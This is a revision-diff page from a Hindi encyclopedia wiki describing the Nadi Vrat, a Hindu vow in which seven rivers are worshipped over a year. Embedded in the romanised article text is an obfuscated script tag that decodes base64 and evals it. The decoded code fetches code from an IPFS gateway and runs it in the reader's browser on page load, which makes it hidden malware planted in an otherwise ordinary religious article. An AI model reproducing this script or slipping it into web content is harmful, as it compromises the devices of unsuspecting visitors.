Difference between revisions of "नदी व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - ")</ref" to "</ref")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[चैत्र]] [[शुक्ल पक्ष]] से प्रारम्भ होता है।  
 
*[[चैत्र]] [[शुक्ल पक्ष]] से प्रारम्भ होता है।  
 
*सात दिनों तक नक्त विधि से यह चलता रहता है।  
 
*सात दिनों तक नक्त विधि से यह चलता रहता है।  
Line 5: Line 5:
 
*एक वर्ष भर प्रति मास 7 दिनों तक चलता रहना चाहिए।
 
*एक वर्ष भर प्रति मास 7 दिनों तक चलता रहना चाहिए।
 
*जल में दूध चढ़ाया जाता है, दूध से पूर्ण घटों का दान किया जाता है।
 
*जल में दूध चढ़ाया जाता है, दूध से पूर्ण घटों का दान किया जाता है।
*वर्ष के अन्त में फाल्गुन में ब्राह्मणों को एक पल चाँदी का दान किया जाता है।<ref>हेमाद्रि (व्रत॰ 2, 462); [[मत्स्य पुराण]] (212|40-41); [[वायु पुराण]] (47|38-39, यहाँ [[गंगा]] की सात धाराओं का उल्लेख है)</ref>
+
*वर्ष के अन्त में फाल्गुन में ब्राह्मणों को एक पल चाँदी का दान किया जाता है।<ref>हेमाद्रि (व्रत॰ 2, 462); [[मत्स्य पुराण]] (212|40-41); [[वायु पुराण]] (47|38-39, यहाँ [[गंगा]] की सात धाराओं का उल्लेख है</ref>
*हेमाद्रि<ref>हेमाद्रि (व्रत 1, 792)</ref> में सरस्वती की पूजा है।
+
*हेमाद्रि<ref>हेमाद्रि (व्रत 1, 792</ref> में सरस्वती की पूजा है।
  
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:51, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • chaitr shukl paksh se prarambh hota hai.
  • sat dinoan tak nakt vidhi se yah chalata rahata hai.
  • sat nadiyoan, yatha—hladini (ya nalini), hladini, pavani, sita, ikshu, sindhu, bhagirathi ki pooja ki jati hai.
  • ek varsh bhar prati mas 7 dinoan tak chalata rahana chahie.
  • jal mean doodh chadhaya jata hai, doodh se poorn ghatoan ka dan kiya jata hai.
  • varsh ke ant mean phalgun mean brahmanoan ko ek pal chaandi ka dan kiya jata hai.[1]
  • hemadri[2] mean sarasvati ki pooja hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vrat॰ 2, 462); matsy puran (212|40-41); vayu puran (47|38-39, yahaan ganga ki sat dharaoan ka ullekh hai
  2. hemadri (vrat 1, 792

any sanbandhit liank